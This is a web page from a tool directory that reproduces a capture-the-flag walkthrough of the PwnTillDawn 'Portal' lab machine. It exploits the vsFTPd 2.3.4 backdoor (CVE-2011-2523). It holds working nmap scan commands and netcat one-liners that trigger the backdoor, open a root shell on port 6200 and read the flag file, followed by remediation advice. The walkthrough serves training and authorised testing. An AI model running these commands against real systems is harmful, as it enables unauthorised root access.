Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PwnTillDawn-Portal-Walkthrough — A detailed penetration testing walkthrough and exploitation report for the 'Portal' machine, focusing on CVE-2011-2523 (vsFTPd 2.3.4 Backdoor) to achieve root access. | Kitploit
Tools/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationPost-ExploitationCTFPenetration TestingLearning & Education

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

A detailed penetration testing walkthrough and exploitation report for the 'Portal' machine, focusing on CVE-2011-2523 (vsFTPd 2.3.4 Backdoor) to achieve root access.

View Repository
25 months agoNot yet reviewed

🔐 Vulnerability Assessment & Penetration Testing (VAPT)

📌 Project: Target Exploitation Walkthrough

⚠️ This project is for educational and authorized testing purposes only.
Unauthorized access to systems is strictly prohibited.


👨‍💻 Author

SYAFIQ
Role: Lead Penetration Tester


🎯 Target Information

  • Target IP: 10.150.150.12
  • Operating System: Ubuntu Linux
  • Status: 🔴 CRITICAL (Backdoor Detected)
  • Vulnerability: CVE-2011-2523 (vsFTPd Backdoor)

🧭 Attack Overview

PhaseToolDescription
DiscoveryNmapScan network for live hosts
EnumerationNmapIdentify services & versions
AnalysisNSE ScriptDetect known vulnerability
ExploitationNetcatTrigger backdoor
Post-ExploitationTerminalGain root access & retrieve flag

🚀 Step-by-Step Walkthrough

🔍 Step 1: Network Reconnaissance

Scan for active hosts in the network:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Result:

-8 hosts detected -Target identified: 10.150.150.12

🔎 Step 2: Service Enumeration

Scan open ports and services:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Findings:

-Port 21 → FTP (vsftpd) -Port 22 → SSH (OpenSSH 8.2p1)

⚠️ Step 3: Vulnerability Scanning

Check for known FTP backdoor vulnerability:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Result:

-Target is VULNERABLE -CVE-2011-2523 confirmed

💣 Step 4: Exploitation

Trigger the backdoor using malicious username:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ This opens a hidden root shell on port 6200

🔓 Step 5: Gain Access (Root Shell)

Connect to backdoor and execute commands:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Result:

Root access obtained uid=0(root) confirmed

🏁 Flag Captured:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Key Takeaways

Always update outdated services (vsFTPd was vulnerable) Misconfigured services can lead to full system compromise Simple scans can reveal critical vulnerabilities -🛡️ Recommendations -🔄 Update FTP service to latest version -🚫 Disable unnecessary services -🔐 Use firewall to restrict access -📊 Perform regular security audits -📚 Disclaimer

This project is created strictly for:

Learning cybersecurity Ethical hacking practice Authorized penetration testing

❌ Do NOT use this knowledge for illegal activities.

⭐ Final Note

“Security is not a product, but a process.” — Always test, monitor, and improve.

Download Tool